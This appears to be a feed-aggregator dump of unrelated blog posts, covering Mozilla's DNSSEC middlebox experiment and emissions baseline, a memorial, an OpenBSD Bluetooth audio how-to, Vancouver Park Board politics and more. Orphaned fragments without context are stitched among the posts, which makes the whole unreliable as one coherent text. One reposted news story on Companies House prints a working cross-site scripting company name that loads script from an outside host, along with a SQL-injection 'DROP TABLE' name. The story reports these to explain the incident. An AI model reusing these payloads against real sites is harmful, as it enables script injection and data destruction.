Rolandt

Overview

The Domain Name System (DNS) is often referred to as the “phonebook of the Internet.” It is responsible for translating human readable domain names–such as mozilla.org–into IP addresses, which are necessary for nearly all communication on the Internet. At a high level, clients typically resolve a name by sending a query to a recursive resolver, which is responsible for answering queries on behalf of a client. The recursive resolver answers the query by traversing the DNS hierarchy, starting from a root server, a top-level domain server (e.g. for .com), and finally the authoritative server for the domain name. Once the recursive resolver receives the answer for the query, it caches the answer and sends it back to the client.

Unfortunately, DNS was not originally designed with security in mind, leaving users vulnerable to attacks. For example, previous work has shown that recursive resolvers are susceptible to cache poisoning attacks, in which on-path attackers impersonate authoritative nameservers and send incorrect answers for queries to recursive resolvers. These incorrect answers then get cached at the recursive resolver, which may cause clients that later query the same domain names to visit malicious websites. This attack is successful because the DNS protocol typically does not provide any notion of correctness for DNS responses. When a recursive resolver receives an answer for a query, it assumes that the answer is correct.

DNSSEC is able to prevent such attacks by enabling domain name owners to provide cryptographic signatures for their DNS records. It also establishes a chain of trust between servers in the DNS hierarchy, enabling clients to validate that they received the correct answer.

Unfortunately, DNSSEC deployment has been comparatively slow: measurements show, as of November 2020, only about 1.8% of .com records are signed, and about 25% of clients worldwide use DNSSEC-validating recursive resolvers. Even worse, essentially no clients validate DNSSEC themselves, which means that they have to trust their recursive resolvers.

One potential obstacle to client-side validation is network middleboxes. Measurements have shown that some middleboxes do not properly pass all DNS records. If a middlebox were to block the RRSIG records that carry DNSSEC signatures, clients would not be able to distinguish this from an attack, making DNSSEC deployment problematic. Unfortunately, these measurements were taken long ago and were not specifically targeted at DNSSEC. To get to the bottom of things, we decided to run an experiment.

Measurement Description

There are two main questions we want to answer:

• At what rate do network middleboxes between clients and recursive resolvers interfere with DNSSEC records (e.g., DNSKEY and RRSIG)?
• How does the rate of DNSSEC interference compare to interference with other relatively new record types (e.g., SMIMEA and HTTPSSVC)?

At a high level, in collaboration with Cloudflare we will first serve the above record types from domain names that we control. We will then deploy an add-on experiment to Firefox Beta desktop clients which requests each record type for our domain names. Finally, we will check whether we got the expected responses (or any response at all). As always, users who have opted out of sending telemetry or participating in studies will not receive the add-on.

To analyze the rate of network middlebox interference with DNSSEC records, we will send DNS responses to our telemetry system, rather than performing any analysis locally within the client’s browser. This will enable us to see the different ways that DNS responses are interfered with without relying on whatever analysis logic we bake into our experiment’s add-on. In order to protect user privacy, we will only send information for the domain names in the experiment that we control—not for any other domain names for which a client issues requests when browsing the web. Furthermore, we are not collecting UDP, TCP, or IP headers. We are only collecting the payload of the DNS response, for which we know the expected format. The data we are interested in should not include identifying information about a client, unless middleboxes inject such information when they interfere with DNS requests/responses.

We are launching the experiment today to 1% of Firefox Beta desktop clients and expect to publish our initial results around the end of the year.

The post Measuring Middlebox Interference with DNS Records appeared first on Mozilla Security Blog.

These figures are nothing short of spectacular considering there’s a couple of top-of-the-line Intel and AMD chips in the comparisons. I can’t wait to see what these chips can do with a little more die size and some more fine tweaking.

This morning I watched parts of Andy Matuschak’s stream that shows him working on processing his thoughts and notes from a book he read.
It’s about 100 minutes of seeing him making notes….

There is much value in getting an insight in how other people actually do their work (the master-apprentice model is important for a reason), and it is not often you get to see how knowledge workers organise and do the things they do. It’s why I e.g. documented the way I currently use Obsidian for my PKM system. As a resource for my future self, and as a way to offer others a glimpse so they may take some part of it that fits with their own practices.

Andy Matuschak basically took the idea of live streaming your gaming adventures, to live stream a note taking session. And it’s highly fascinating. Because it shows it is actual work that takes time and energy, digesting a book, following lines of thought, doubling back, referencing earlier material, looking things up in the book in question etc. Also of interest is he is focusing on the tensions that what he read causes with other things he knows and has read. He’s not just lifting things out that chime with him, but the things that cause friction. Because in that friction lies the potential of learning.

I had come across this video earlier already this summer, and then only watched the first few minutes. Then I was expecting something else, that the video would show his set-up. I didn’t have time to watch someone go through their actual process. Now I re-encountered it in a different context and the video made much more sense this time

Browsing through Andy Matuschak’s public Digital Garden is also interesting to do.

This is a handy little webclipper that grabs a page and downloads it in markdown. Just yesterday evening I thought about making something that simply grabs the content of a page and stores it to an inbox folder on my laptop. So I don’t have to copy paste things myself. But it already exists. The clipper has settings so you can add things like the URL you clip from is incorporated in the saved markdown file.

When we launched our Environmental Sustainability Programme in March 2020, we identified three strategic goals:

1. Reduce and mitigate Mozilla’s organisational impact;
2. Train and develop Mozilla staff to build with sustainability in mind;
3. Raise awareness for sustainability, internally and externally.

Today, we are releasing our baseline Greenhouse Gas emissions (GHG) assessment for 2019, which forms the basis upon which we will build to reduce and mitigate Mozilla’s organisational impact.

GHG Inventory: Summary of Findings

Mozilla’s overall emissions in 2019 amounted to: 799,696 mtCO2e (metric tons of carbon dioxide equivalent).

• • Business Services and Operations: 14,222 mtCO2e
    • Purchased goods and services: 8,654 mtCO2e
    • Business travel: 2,657 mtCO2e
    • Events: 1,199 mtCO2e
    • Offices and co-locations: 1,195 mtCO2e
    • Remotees: 194 mtCO2e
    • Commute: 147 mtCO2e
  • Product use: 785,474 mtCO2e

How to read these emissions

There are two major buckets:

1. Mozilla’s impact in terms of business services and operations, which we calculated with as much primary data as possible;
2. The impact of the use of our products, which makes up roughly 98% of our overall emissions.

In 2019, the use of products spanned Firefox Desktop and Mobile, Pocket, and Hubs.

Their impact is significant, and it is an approximation. We can’t yet really measure the energy required to run and use our products specifically. Instead, we are estimating how much power is required to use the devices needed to access our products for the time that we know people spent on our products. In other words, we estimate the impact of desktop computers, laptops, tablets, or phones while being online overall.

For now, this helps us get a sense of the impact the internet is having on the environment. Going forward, we need to figure out how to reduce that share while continuing to grow and make the web open and accessible to all.

The emissions related to our business services and operations cover all other categories from the GHG protocol that are applicable to Mozilla.

For 2019, this includes 10 offices and 6 co-locations, purchased goods and services, events that we either host or run, all of our commercial travel including air, rail, ground transportation, and hotels, as well as estimates of the impact of our remote workforce and the commute of our office employees, which we gathered through an internal survey.

How we look at this data

1. It’s easy to lose sight of all the work we’ve got to do to reduce our business services and operations emissions, if we only look at the overarching distribution of our emissions:
2. If we zoom in on our business services and operations emissions, we’ll note that our average emissions per employee are: 12 mtCO2e.
3. There is no doubt plenty of room for improvement. Our biggest area for improvement will likely be the Purchased Goods and Services category. Think: more local and sustainable sourcing, switching to vendors with ambitious climate targets and implementation plans, prolonging renewal cycles, and more. 
4. In addition, we need to significantly increase the amount of renewable energy we procure for Mozilla spaces, which in 2019 was at: 27%.
5. And while a majority of Mozillians already opt for a low-carbon commute, we’ll explore additional incentives here, too:
6. We will also look at our travel and event policies to determine where we add the most value, which trip is really necessary, how we can improve virtual participation, and where we have space for more local engagement.

You can find the longform, technical report in PDF format here.

We’ll be sharing more about what we learned from our first GHG assessment, how we’re planning to improve and mitigate our impact soon. Until then, please reach out to the team should you have any questions at sustainability@mozilla.com.

The post Release: Mozilla’s Greenhouse Gas emissions baseline appeared first on The Mozilla Blog.

Anjo Anjewierden passed away unexpectedly last week. We didn’t have much contact in recent years, but he has a warm place in my heart. We worked together exploring what you can learn from digital traces that people leave. Part of that work, understanding knowledge flows in weblogs and weblog conversations, became an integral part of my PhD research.

Anjo was a pleasure to work with – an independent maker ready to explore and to build together. At times it really felt like a ball game – when you toss the ball between each other not knowing what the next move would be, but trusting that it would be a good one. This feeling was particularly strong when Anjo took up blogging – seeing how his experiments with datasets and visualisation continue between our meetings was a nice treat for both, getting inspiration for further work and seeing his thought process.

I took the liberty to cite one post as a whole (I like it and I am not sure what is going to happen with Anjo’s weblog in the future):

Weblog data as art

There are days one feels like winning the lottery. I discovered Lattice Uncertainty Visualization. This may not sound too appealing to many, but there are some very neat ideas about the visualisation of uncertainty (probabilities) in large data sets, particularly the use of various visualisation techniques for emphasis.

Something else I was searching for is a “reasonable” visualisation of events that occur over time. As it is, events happen over time all the time, but how to visualise them is not always that trivial. An example is the rate of blogging. Plotting a simple histogram of the number of posts per day is rather boring and difficult to interprete. And, for most of us, it would generate a rather silly visualisation of blogging (in)frequently.

An idea is to draw a dotted line for each post. Given that dotted lines contain white space, this also accommodates multiple posts a day (for the heavy bloggers among us; by filling some of the white dots). An example is given in the background of the image below. The foreground (see also a previous post) depicts self-linking (top) and linking to others (bottom).

On a personal side, there are several things that come up every time when I think about Anjo.

When he took me cycling to Oldenzaal as an avid cyclist he was very patient with my speeds and caring to make sure that we had enough stops so I could recover.

When I was pregnant and we were looking for a name that would work equally well in Russia and in the Netherlands he, very much in line with his work attitude, built a code running through the lists of names used in both cultures and came up with an overlapping list. Alexander’s name was on that list, obviously.

Another thing I remember fondly was about a meeting we had in Anjo’s office at the UT when I had to take little Alexander with me. Alexander lost a piece from his wooden stacking toy there. We have never replaced it and I thought about that meeting every time when one of the kids played with it. Anjo referred to that meeting in a different way, reflecting on the nature of research, existing methods and datasets:

Last week, Lilia and I had a discussion about a chapter of her thesis. Lilia’s little toddler Alexander (1 year and 3 months) was present. He liked emptying my trash bin, putting the trash into the bin again, emptying it and so forth indefinitely. Perhaps, researchers, once they have reached a certain level of maturity, become toddlers again.

Knowing how much Anjo contributed to the research of others with developing new methods and tools I am sure he will be missed as an important piece of the puzzle. From the other side, he will also continue to be part of it with the ideas and code he developed. In that sense, his weblog tagline “the source code is the ultimate documentation” is telling.

• In memoriam and condolences, University of Twente
• Anjo’s UTwente page and list of publications (also at ResearchGate)
• Anjo’s weblog
• My weblog posts referencing Anjo or his work (still updating)
• My posts on Twitter and Facebook with the comments of others

The post In memoriam: Anjo Anjewierden appeared first on Mathemagenic.

Walking along the river Laak this afternoon, where the river and city on the left is on higher ground than the water and the fields of the polder on the right. A somewhat typical Dutch occurrence, seeing water flow higher than surrounding land.

One of my correspondents posted recently that, rather than living in fear, he was having 13 or more people to Thanksgiving at his house. Liberals and health professionals would have you believe that is risky. But just how risky? We all do risk calculations every day. If cars are speeding by on a busy street, … Continued

The post Calculating your Thanksgiving COVID-19 risk appeared first on without bullshit.

Je découvre (avec beaucoup de retard) qu’il existe un MOOC Energie & Climat à l’attention des jeunes, produit par l’association Avenir Climatique et l’Association Bilan Carbone. Je viens de visualiser la Saison 1, et elle est vraiment bien faite. On pourrait dire que c’est comme le cours de JM Jancovici à l’école des Mines, mais moins pointu en terme de pré-requis scientifiques.

Ca se présente sous forme de 5 épisodes d’une vingtaine de minutes :

1. MOOC Energie / Climat S01E01 : Nous sommes accros aux énergies fossiles
2. MOOC Energie / Climat S01E02 : Combien nous reste t-il d’énergie fossile ?
3. MOOC Energie / Climat S01E03 : Changement Climatique - Chaud Devant !
4. MOOC Energie / Climat S01E04 : 2°C - Evitons l’ingérable, gérons l”inévitable !
5. MOOC Energie / Climat S01E05 : Et maintenant qu’est ce qu’on fait ?

Tout l’intérêt est que contenu est très professionnel, bien présenté, bien filmé, avec les bonnes sources scientifiques et même le support associé (kit du conférencier). Par la suite, deux autres saisons vous attendent :

• Saison 2 : apprendre à Compter le CO2 et passer à l’action
• Saison 3 : les freins à la transition.

Allez hop, au boulot !

The toy manufacturer Fisher Price released a play set for the home office. Kittens and puppies feature as your coworkers when you flip open your laptop or make a call on your smartphone. The telecommuter headset, to-go coffee cup and charts depicting hockey-stick growth complete the scene.

It was like a sucker punch to the soul.

Why? That got me thinking about toys and how they convey to children (and the adults who buy them) what is desirable and visible in society, as well as hold up a mirror to what is really there.

Talking this through with Chris Lawrence, he pointed out that the toys are important for role play. Kids see the adults around them doing things like videoconferencing, or cleaning or going to the supermarket or visiting the doctor, and they want to imitate it.

It made me realize that the heartbreaking thing isn’t the toys themselves and that kids wants to play like their parents, but that the Fisher Price Home Office kit makes visible the deeper grind of many desk jobs within an extractive hyper-capitalist system.

So, what jobs do toys depict? And why?

Take a stroll through a toy store, which I am now more obliged to do these days, and you’ll see a telling tale. Racks and racks of police gear. Firefighters and construction workers. Kings and queens and princes and princesses. Trains, dolls and crafts. Magic. And now the Fisher Price Home Office.

It struck me that many toys are high authority. Imagining yourself as a king or police officer is a rush. And there isn’t a lot of cash being made selling the role of the indentured servant or Death Row inmate.

Why are we, kids and grown-ups and toy makers, all playing into the power structures of medieval Europe or the prison-industrial complex of the US? These structures are of course with us today, but we should be critical of them and dismantle them—not teach our next generation to keep it going.

So now I ask, if toys both reflect society as it is, and also encourage it to be as we want it to be, then where for the love of Earth is democracy in any of this? Where are the democratic toys?

Learn to count with the ballot box! The Citizen Assembly Erector Set! Council Member Ken and Mayor Barbie! Mondragon Corporation: The Co-Op Board Game! A demonstrators’ craft kit!

Democracy is completely invisible in children’s play today. Let’s not stunt our collective imagination by hiding democracy from play. Democracy isn’t a fantasy. It’s all around us, if we actually look and care about it. We can make democracy visible and desirable through play, and then we might even have a generation of empowering and creative ways to shape the world equitably.

See, fun for all ages! Kids even like a good mess.

Image: Unohdettu, Veikko Stålhammar, Finnish National Gallery. Public Domain.

This is a list, which I’ll add to as I encounter new things, of ways in which content on this blog has disappeared over the years.

• Share on OVI: As documented here, for a time in 2008 I embedded photos from Nokia’s Share on OVI platform in blog posts. Nokia eventually shut this down, and all the embedded photos are lost as a result. I’ve been able to recover some of them, manually, when I saved them elsewhere, and I’ve been working at updating blog posts, day by day, when I encounter these.
• RealAudio at CBC: CBC Radio used to post the occasional radio piece I contributed to, like this one, in RealAudio format. RealAudio is a dead format, and the CBC broke all the links to these files in any case. They weren’t scraped by the Internet Archive either.
• YouTube Flash embeds: I used to post videos here by uploading them to YouTube, then copying and pasting the YouTube Flash embed code into the source of posts. That all broke when I started to user browser that didn’t support Flash (and Flash support, web-wide, is coming to a complete end soon). Fortunately the videos are still on YouTube, so I’ve been downloading them, transcoding, and uploading them to a server I control, and then simply embedding them with a video element. I described this process here.

Fifteen years ago, NetBSD’s Bluetooth audio stack was imported into OpenBSD. From what I remember using it back then, it worked sufficiently well but its configuration was cumbersome. It supported Bluetooth HID keyboards and mice, audio, and serial devices. Six years ago, however, it was tedu'd due to conflicts with how it integrated into our kernel.

While we still have no Bluetooth support today, it is possible to play audio on Bluetooth headphones using a small hardware dongle.

Table of Contents

1. Creative BT-W2
2. Creative BT-W3
3. Automatically Switching to Bluetooth
4. Responding to Headphone Buttons

Creative BT-W2

Last year I came across the Creative BT-W2 USB device, which presents a standard uaudio(4) device on OpenBSD and handles all of the Bluetooth pairing and audio communication itself with just one shortcoming: it did not expose any volume control mechanism. OpenBSD’s sound server, sndiod, did have software volume control so it was possible to limit the volume through aucatctl (now sndioctl).

I’ve been using the BT-W2 frequently since then to send audio from my OpenBSD laptop to my Apple AirPods Pro, but unfortunately Apple released a firmware at some point that limited the volume output when paired with such devices, including Android phones. Presumably this was a safety measure because unless the sending side was doing software volume control (which the AirPods wouldn’t know about), the AirPods would play at maximum volume.

Unfortunately, even at the loudest volume from sndiod, the volume to the AirPods was still quite low, sometimes even too low to understand YouTube videos with poor audio like conference talks. Otherwise though, the BT-W2 worked well and I didn’t notice any latency or video sync issues on OpenBSD.

Creative BT-W3

The other day I became aware of the updated Creative BT-W3, which now has a USB-C interface instead of USB-A and finally exposes hardware mixer control (note the 2 ctls):

uaudio0 at uhub0 port 3 configuration 1 interface 1 "Creative Technology Ltd Creative BT-W3" rev 2.00/1.00 addr 2
uaudio0: class v1, full-speed, sync, channels: 2 play, 1 rec, 2 ctls
audio1 at uaudio0

Since Tweeting about the BT-W2 last year, OpenBSD’s audio system has changed quite a bit and now sndiod controls output volume itself with sndioctl being the preferred utility, rather than directly changing hardware mixer settings with mixerctl as in years past. The new hardware volume control (outputs.dac) can still be seen or modified directly with mixerctl and passing it the control device for audio1 (as the default /dev/audioctl0 is for the built-in audio device of my laptop):

# mixerctl -f /dev/audioctl1
outputs.dac=161
outputs.dac_mute=off
record.enable=sysctl

Whatever mechanism the BT-W3 uses to handle this hardware volume control (whether just doing software volume limiting itself, or passing it through to the AirPods through some fancy audio protocol), the benefit is that now the AirPods can be used at full volume from OpenBSD.

Automatically Switching to Bluetooth

My laptop’s Dolby Atmos speaker setup is pretty good, so normally I just listen to music or play YouTube videos through the speakers. When my son is napping and I need to use my AirPods, I want to just plug in the BT-W3 dongle and have it automatically start sending audio to my AirPods, and have the volume controls on my keyboard control the AirPods.

To accomplish this, set an alternate device name with sndiod:

# rcctl set sndiod flags -f rsnd/0 -F rsnd/1
# rcctl restart sndiod

In this mode, sndiod will play through rsnd/1 if it exists, which maps to the second audio device (audio1). If the device is not present, such as when the BT-W3 is not plugged in, it will play through rsnd/0 which maps to audio0, the laptop’s built-in speakers.

This works fine if the device is present when sndiod starts, but otherwise it will need a SIGHUP to re-scan the audio devices once the BT-W3 is plugged in, and start sending audio through it. This can be done automatically with hotplugd:

# cat > /etc/hotplug/attach
case $2 in
uaudio*)
	pkill -HUP sndiod
	;;
esac
^D
# chmod +x /etc/hotplug/attach
# rcctl enable hotplugd
# rcctl start hotplugd

Now when a new uaudio device is plugged in and detected by the kernel, hotplugd will send a SIGHUP to sndiod which will see that rsnd/1 is available and start sending audio to it. When the BT-W3 is unplugged, sndiod will automatically detect that the device is no longer usable and send audio to its fallback, rsnd/0. Hardware device switching will be seamless and any applications playing audio won’t have to stop or be restarted.

My window manager is configured to respond to the hardware volume keys on my laptop (F4 for mute, F5 for volume down, and F6 for volume up) by executing sndioctl, so the commands will work the same regardless of which device sndiod is talking to.

definekey top F4 exec sndioctl -q output.mute=!; pkill -USR1 i3status; true
definekey top F5 exec sndioctl -q output.mute=0; sndioctl -q output.level=-0.05; pkill -USR1 i3status; true
definekey top F6 exec sndioctl -q output.mute=0; sndioctl -q output.level=+0.05; pkill -USR1 i3status; true

Responding to Headphone Buttons

If your Bluetooth headphones have buttons on them, these can pass through the BT-W3 as USB HID reports. My AirPods Pro have one hardware button (a squeeze on the stem) which can be single, double, or triple pressed to perform a play/pause, next track, and previous track.

The possible actions that the BT-W3 supports can be seen with usbhidctl on the first HID report of the device, which must be located in dmesg:

uaudio1 at uhub0 port 1 configuration 1 interface 1 "Creative Technology Ltd Creative BT-W3" rev 2.00/1.00 addr 10
uaudio1: class v1, full-speed, sync, channels: 2 play, 1 rec, 2 ctls
audio2 at uaudio1
uhidev4 at uhub0 port 1 configuration 1 interface 3 "Creative Technology Ltd Creative BT-W3" rev 2.00/1.00 addr 10
uhidev4: iclass 3/0, 3 report ids
uhid11 at uhidev4 reportid 1: input=2, output=0, feature=0
[...]

In my case, the first HID report on the BT-W3 is uhid11, so running usbhidctl on /dev/uhid11 can retrieve the full report descriptor:

# usbhidctl -f /dev/uhid11 -r
Report descriptor:
Collection page=Consumer usage=Consumer_Control
Input   size=1 count=1 page=Consumer usage=Play/Pause, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Scan_Next_Track, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Scan_Previous_Track, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Stop, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Play, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Pause, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Fast_Forward, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Rewind, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Volume_Increment, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Volume_Decrement, logical range 0..1
Input   size=1 count=1 page=Consumer usage=Mute, logical range 0..1
End collection
Total   input size 2 bytes
Total  output size 0 bytes
Total feature size 0 bytes

By using the -l option, input reports can be seen when the button on the AirPod is pressed:

# usbhidctl -f /dev/uhid11 -l
Consumer_Control.Play/Pause=1
Consumer_Control.Scan_Next_Track=0
Consumer_Control.Scan_Previous_Track=0
Consumer_Control.Stop=0
Consumer_Control.Play=0
Consumer_Control.Pause=0
Consumer_Control.Fast_Forward=0
Consumer_Control.Rewind=0
Consumer_Control.Volume_Increment=0
Consumer_Control.Volume_Decrement=0
Consumer_Control.Mute=0

Consumer_Control.Play/Pause=0
[...]

One event is generated to report Consumer_Control.Play/Pause=1, then another right after it to report Consumer_Control.Play/Pause=0.

To automate responding to these events, usbhidaction can be used. By default, the /dev/uhid* devices are owned by root:wheel and are mode 0600, so to make things easier, I’ll chmod them 0660 so I can access them without doas. This needed because the program has to run as my own user to access my X11 session and environment variables.

With a simple configuration file, I can make usbhidaction run my music script to play/pause, skip to the next track, or play the previous track.

$ cat .usbhidaction.conf
Consumer:Play/Pause             1
	~/bin/music playpause
Consumer:Scan_Next_Track        1
	~/bin/music next
Consumer:Scan_Previous_Track    1
	~/bin/music prev

$ usbhidaction -dv -c .usbhidaction.conf -f /dev/uhid11
PARSE:1 Consumer:Play/Pause, 1, '~/bin/music playpause'
PARSE:2 Consumer:Scan_Next_Track, 1, '~/bin/music next'
PARSE:3 Consumer:Scan_Previous_Track, 1, '~/bin/music prev'
report size 2
executing '~/bin/music playpause'

Unfortunately usbhidaction is not a very user-friendly program so it must be started after the BT-W3 is plugged in and you must lookup which uhid device is the correct one to operate on each time.

I have some hacks to work around these issues but it would be nice to have something more generic that listens for input reports from all uhid devices automatically and outputs them on some device stream that any program can listen to. But that is a project for another time.

In short, Apple has created a fork of TensorFlow (a machine learning package) which is accelerated on Macs (including the new M1 Macs).

One of the problems I've encountered when trying out machine learning ideas is that a lot of sample code and tutorials out there are written with TensorFlow in mind, but CoreML is the standard library on MacOS. And the TensorFlow to CoreML model converters seemed a bit finicky. I'm hoping this new Apple improved branch of TensorFlow will be a lot nicer.

Yesterday I was surprised and pleased to see that the Harbord bike lanes were getting some concrete barriers as an upgrade. These are the same types of barriers recently installed on Scarlett Rd, although not decorated.

This morning, I saw a crew installing some more, right in front of Central Tech.

I didn’t know that each piece weighs 759 kg. Also there are rebar hooks and loops to tie them together.

Here is a picture of the installation this evening, which appears to be complete.

Of course, when I posted the first picture to facebook yesterday, lots of people commented that they wished that more barriers would be put in other places, such as in front of the Krispy Kreme just east of Bathurst. For those of us who ride the Harbord bike lanes pretty much every day, we know that this is one of the worst spots in terms of people parking in the bike lane.

Alas, this is not possible since the concrete barriers can only be installed where this is a buffer zone of a certain width, and not a simple line of paint as shown above. Unfortunately at this spot, any extra road width available for a buffer on the south side is taken up by both a left turn lane, as well as a bus stop on the other side.

I can only hope that the city decides to install concrete barriers underneath the bridges on the Bloor bike lane, as they have done recently along Lansdowne and Runnymede. The original design calls for just low curbs with bollards, which I don’t think are as protective.

We are excited to announce the first Beta release of Photoshop running natively on Windows ARM devices!

This early version of Photoshop for ARM offers many of the core Photoshop features that you've come to rely on for your day to day editing needs, and we'll be adding more features in the weeks to come. Note that Beta software is not officially supported yet by Adobe, but we want to hear from you, and this is the place to let us know how it's going.

Needs Surface Pro X with at least 8GB RAM and Windows 10 build 19041.488

More >

[Thanks, Samuel]

Letzte Woche schrieb mir Anna:

Kekz bringt im kommendem Frühjahr einen kabellosen Kinderkopfhörer auf den Markt, der unterwegs kindgerechte Unterhaltung ohne Ablenkung ermöglicht. Also ohne Handy oder Tablet, ohne Bildschirm und ohne externe Audioquelle. Ich kann mir eine Zukunft ohne Prinzessin Lillifee in Dauerschleife im Auto zwar kaum mehr vorstellen, dennoch freut sich irgendetwas in mir darauf, mein Handy und Auto-Entertainment endlich wieder zurückzuergattern ;)

Ich hatte eine Menge Fragen und nach einigem Hin und Her habe ich verstanden:

• Der kindgerechte Kekz-Kopfhörer soll 60 Euro kosten. Inhalte dafür zwischen sieben und elf Euro.
• Der gesamte verfügbare Audiokatalog ist bereits auf dem Kopfhörer vorinstalliert - ca. 800 Alben bzw. 32 GB. Die Freigabe der Alben erfolgt über sogenannte Kekze.
• Bei Verbindung mit dem Kekze Chip weist der NFC-Reader in der Ohrmuschel die NFC-ID des Chips dem passenden Inhalt auf dem Kopfhörer zu und spielt das Album oder Hörbuch ab.
• Updates mit neuen Alben und Hörspielen etc. erfolgen nach Verfügbarkeit. Der neue Content kann dann per USB-C Kabel über Laptop, Tablet oder Handy aus der Kekze Cloud geladen werden, um durch die Kekze Chips aktiviert werden zu können.
• Sogenannte Wunder Kekze können zudem mit beliebigem Content über die Kekze Cloud selbst bespielt werden.

Das ist also ein ähnliches Prinzip wie bei einem Gameboy und den Cartridges. Mit dem wesentlichen Unterschied, dass die Kekze nicht den Inhalt tragen sondern nur die Freigabe.

Bei einem solchen geschlossenen System hatte ich zunächst ziemliche Bedenken. Aber es gibt eine interessante Sicht, die ich ohne Kinder nicht erkannt habe. Also noch mal nachgefragt:

Ok, als Mama einer Dreijährigen würde ich das anders formulieren: Eine Möglichkeit für meine Tochter, unterwegs ihre Hörbücher und Musik selbstbestimmt zu steuern und unabhängig von meinem Handy zu hören. Optimal für uns.

Der Content ist auf dem Kopfhörer vorinstalliert und bleibt auf dem Gerät. Damit kann der Kopfhörer mit den entsprechenden Chips auch ohne Anbindung an die Cloud uneingeschränkt genutzt werden.

Wenn die Kinder irgendwann mal aus dem Alter rausgewachsen sind, geht der Kopfhörer an jüngere Geschwister oder Freunde bzw. kann verkauft werden – wie alle unsere Spielzeuge. Bei uns macht beispielsweise im engsten Familienumfeld alles die Runde – von Spielsachen über Anziehsachen bis hin zu Rädern etc. Vom ersten bis zum letzten Kind liegt die Nutzungsdauer bei über 7 Jahren. Und selbst dann wandern die Sachen nicht in den Müll, sondern werden außerhalb unserer Familie weitergegeben.

Am Ende geht es darum, dass Keinkinder ein haptisches Erlebnis brauchen, damit sie selbstständig handeln können. Die kommen zwar auch schnell mit einem iPad klar, aber dann werden sie von der visuellen Ablenkung gefangen.

Was mir aufstößt ist die Notwendigkeit, Inhalte erneut in einem anderen Format kaufen zu müssen.

More >

mkalus shared this story from jwz.

The company is now legally known as "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD".

He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.

The original name of the company was ""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD". By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

Similar names have been registered in the past, such as "; DROP TABLE "COMPANIES";-- LTD", a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply "Company name available on request". [...]

He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.

A Companies House spokesperson [lied]: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites."

I love that they called it a "chevron".

Chevron 1 was, apparently, not encoded.

Previously.

That is all.

That is how it works.

That is what the machines are learning to do.

mkalus shared this story from Price Tags.

Vancouver is the only city in Canada that still has a separate park board. That means that there is a separately funded staff that exclusively  manages parks and recreational centres, and reports directly to Vancouver City Council on their budget. The mandate of the Park Board is to “provide, preserve, and advocate for parks and recreation services to benefit all people, communities, and the environment.”

Part 23 of the Vancouver Charter sets out what the Park Board does, and allows for seven Park commissioners to be elected at the same time as the City of Vancouver’s council is elected. This section is pretty clear that the mandate of the Park Commissioners is for parks, things that happen in parks and recreational activities/buildings that are associated with parks operations.

For 2020 the Vancouver Park Board had an operating budget of 136 million dollars, with 63 million dollars coming from revenue and 73 million dollars coming from taxes.  The Commissioners themselves receive $17,600 a year with the chair of the Park Commissioners receiving $22,000 a year.  The Park Commissioners meet once or twice a month and you can view their schedule here. The meetings can be a bit surprising to listen to, and it appears that sometimes the Commissioners forget that the public are listening in to their chat on Zoom.

The Park Board has been a bit of a training ground for the politically minded that then go on to try for a Councillor position at the City of Vancouver. The highly regarded Mayor Philip Owen was first a park commissioner. He went on to serve on City Council and then was elected for three terms as Mayor, in 1993, 1996, and 1999.

There are two more years before the next Civic election and that may explain some of the posturing that is being seen as Park Commissioners publicly comment on things that are clearly outside their jurisdiction.

One Park Commissioner has been making unfortunate remarks on how the City of Vancouver manages its own Slow Streets and other initiatives outside of Stanley Park, specifically on Beach Avenue.

There has been engagement  on social media  about perceived challenges on the city’s pilot projects  or shared streets that are clearly in the City’s jurisdiction and completely  outside of the Park Board’s purview.

This sadly is a missed opportunity for Park Commissioners to work with Council and the appropriate City staff to educate themselves on the City’s processes, street safety, and to refer community questions and comments about any perceived difficulties. That shows leadership and learning.

This seems to be the year of everyone’s discontent when it comes to the Park Board Commissioners and the members of Vancouver’s City Council.  There’s still time to show the ability to work together and prudently refer questions and requests to the right jurisdiction that can do a follow up. It’s much more impactful than a social media posture.

That also would demonstrate the kind of leadership residents sorely need for the remaining two years until the 2022 civic elections. It is what citizens deserve.

Images: PeterLaurence,citynews

When we first announced that the Librem 5 would default to the BM818 modem, we listed US and EU variants of the modem that support different frequencies that are in use in those regions. While there are frequency overlaps throughout the world (this is why you can take a phone between the US and Europe and have it work for the most part), having a modem that supports all of your local frequencies ensures the best performance.

Ever since it was discovered that there was a T1 variant to the BM818 modem for the Librem 5, we have gotten questions from our friends in the Asia Pacific region about whether we would offer it. We didn’t want to announce anything until we had modems and could test them in the Librem 5 to ensure they work but I’m happy to announce we just completed that testing and it works!

We will be adding the T1 modem variant to our shop shortly, and for customers in that region, when you get your shipping notification email, we will default to that modem, but you can of course choose the US or EU variant if you prefer.

The post T1 Modem Variant Works In Librem 5 appeared first on Purism.

Stacey Mason, who runs the Fortnightly Fiction Jam, tweets an interesting thought about failed projects:

Creativity is a muscle you flex by trying things without being precious about your ideas. Those half-finished things you drift away from? They're not your magnum opus. Your magnum opus is an idea you haven't had yet. It might be the 3000th thing you try. Fail fast & fail better.

I don’t disagree, but sometimes the answer is to buckle down and finish the damn thing. 90% of success is showing up.

I wish Stacey were writing this at Cerebral Arcade where it would have more space!

Adobe’s Photoshop CC beta for M1-powered Macs is now available.

